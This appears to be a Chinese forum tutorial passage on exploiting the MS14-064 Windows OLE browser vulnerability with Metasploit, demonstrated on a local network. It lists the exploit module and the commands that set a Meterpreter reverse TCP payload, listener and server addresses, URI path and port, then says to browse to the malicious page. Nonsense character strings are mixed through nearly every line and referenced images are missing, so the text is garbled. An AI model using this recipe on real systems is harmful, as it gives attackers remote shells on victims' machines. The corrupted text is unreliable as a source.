+ j1 S+ [4 M7 e' k& m; ^5 [! p
我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示, ^+ k- \' ]6 B8 z
# a& w1 }$ |; j _% U$ P2 T
' U0 ^8 m- c q% c5 ?7 Q% P
开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
3 A, m1 _. `5 q! K' E w* L) k* K
r- z7 X, _& g8 O9 T5 A& i) h+ k7 \- [) b
然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp9 k* K2 k8 u+ L X% f
( N$ B. a# g" L
. P+ {7 x2 u+ L! e2 w: Y2 j. R1 K$ R. Z
set AllowPowershellPrompt true
5 U+ x2 E; T0 p/ _6 F
[7 S8 O z8 Z; @, y+ h" W: U- ]7 Q, _: S4 b
Set LHOST 192.168.0.109. ~4 @# c; O' n0 {8 b1 W: V+ y
: ?7 a" K' B4 J S' P
9 B. M1 p0 {4 A& V+ Y
set SRVHOST 192.168.0.109+ Q# ^/ ]- A0 @6 O6 X
Q) i5 j. G V3 a
. ~$ z% M& Y3 l. X$ b1 j$ ] Set uripath share
2 J' [. I. v6 [6 E
2 t9 P& o; Y8 P( l
' |9 t$ c' y7 ^6 y Set srvport 80& u6 x% N* W0 F8 W2 L
, @: |. x( a: s0 L6 K7 r$ h
9 l5 }, X8 P8 f; o2 U" K0 h) I
6 W7 h5 L J# o: e$ ~- H
1 p; U" U# m* h8 s) C
, z, \9 Y" i7 R2 N5 V
9 w' `, P% L3 [6 n3 |( M P
1 W. o) ?. }8 }' x
! \, ]. Y, T" J$ R) n5 F
! t+ `, L7 J) P3 `& y; R
& Z# |2 j2 O; F+ G2 x
. W& E: ^( a; ? : {2 d' B( }+ H" F j1 P
5 E3 _$ t/ \. ]( F1 ?* b' y
3 l7 o5 g7 H- v0 Q; M: D& K . J, E" S! s1 D- ]" b: o% J4 L
& F5 T. w, `$ e3 l+ N0 B! B' ~6 c& H
+ ^ R) }+ F9 u8 K
下面我们来访问本地地址如图:
* \& }$ ^$ o+ U# I; G7 W- M
! N6 p( |( o' a- ?- _* R
* n2 l9 M/ z* R5 _ , i4 V% r( Z% T6 q
7 E8 Y8 p( V& q
: v4 ~) h8 g& I2 y* A6 C J . D# ?! W& {' }( ?
1 \- n4 Z- ]+ T2 I
+ l% V# i2 l m2 H) K1 N2 p4 l
U( b9 U: S& i+ D5 j0 P